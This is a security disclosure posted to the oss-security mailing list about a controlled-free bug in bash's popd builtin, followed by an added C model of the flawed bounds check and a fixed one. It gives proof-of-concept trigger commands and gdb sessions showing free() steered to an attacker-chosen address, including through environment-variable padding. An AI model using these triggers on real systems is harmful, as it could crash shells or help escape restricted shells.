Date: Thu, 17 Nov 2016 12:04:49 -0500
From: Fernando Muñoz <fernando@...l-life.com>
To: oss-security@...ts.openwall.com
Cc: Chester Ramey <chet.ramey@...e.edu>
Subject: bash - popd controlled free

bash - popd controlled free
====================

popd can be tricked to free a user-supplied address in the following way:

$ popd +-111111

This could be used to bypass restricted shells (rsh) on some environments to cause a use-after-free.

This was already reported to bash devs and only considered a bug; if MITRE considers it could have a security impact, please assign a CVE.

Details
======

$ gdb bash
...
(gdb) r -c 'popd +-67372036'
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bashinstrumentado/bash-4.3/bash -c 'popd +-67372036'

Program received signal SIGSEGV, Segmentation fault.
0x0827f93a in popd_builtin (list=<optimized out>) at ./pushd.def:384
384	      free (pushd_directory_list[i]);
(gdb) print pushd_directory_list[i]
Cannot access memory at address 0x10101010

----

$ export AA=`perl -e 'print "A"x100000'`
$ gdb ./bash
...
(gdb) x/s *((char **)environ+13)
0xbffe75d4:	"AA=", 'A' <repeats 197 times>...
(gdb) run -c 'popd +-805281142'
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bash/bash-4.3/bash -c 'popd +-805281142'

Program received signal SIGSEGV, Segmentation fault.
internal_free (mem=0x41414141, file=0x83fb36c "./pushd.def", line=384, flags=<optimized out>) at malloc.c:863
863	  if (p->mh_alloc == ISMEMALIGN)

- Fernando
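An added illustration, not bash's pushd.def and not part of the report above, modelling the defect pattern behind "popd +-N": the digits after the sign are parsed with a routine that accepts a second sign, so N comes out negative, and a bounds check that only rejects N beyond the top of the stack lets it through. The stack size, parser and index formulas are assumptions chosen so that the two arguments in the report map onto the addresses gdb showed (0x10101010 and 0xbffe75d8 on a 32-bit build with an unallocated, NULL directory list); the hardened check beside it rejects the negative index before any arithmetic.

```c
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical model of a popd-style "+N"/"-N" index computation (an assumption
 * for illustration, not bash's pushd.def). As in the report nothing was pushed,
 * so the stack holds only the current directory at index 0. */
static long stack_top = 0;

/* Parse "+N"/"-N". strtol accepts a sign of its own, so "+-5" gives '+' and -5. */
static int parse_arg(const char *arg, char *direction, long *n)
{
    char *end;
    if (arg[0] != '+' && arg[0] != '-')
        return -1;
    *direction = arg[0];
    *n = strtol(arg + 1, &end, 10);
    return (end != arg + 1 && *end == '\0') ? 0 : -1;
}

/* Flawed check: rejects only N beyond the top; a negative N passes and "+N"
 * resolves to stack_top - N, a huge positive index. */
static long index_flawed(char direction, long n)
{
    if (n > stack_top)
        return -1;
    return direction == '+' ? stack_top - n : n - 1;
}

/* Hardened check: reject negatives before any index arithmetic. */
static long index_checked(char direction, long n)
{
    if (n < 0 || n > stack_top || (direction == '-' && n == 0))
        return -1;
    return direction == '+' ? stack_top - n : n - 1;
}

/* Address free() would receive from a NULL list pointer with 4-byte pointers,
 * wrapped to 32 bits like the target in the report. */
static uint32_t free_target32(long idx)
{
    return (uint32_t)((uint64_t)idx * 4u);
}
```

With the flawed check, "+-67372036" yields index 67372036 and a free() of 0x10101010; the checked version returns -1 for both arguments in the report.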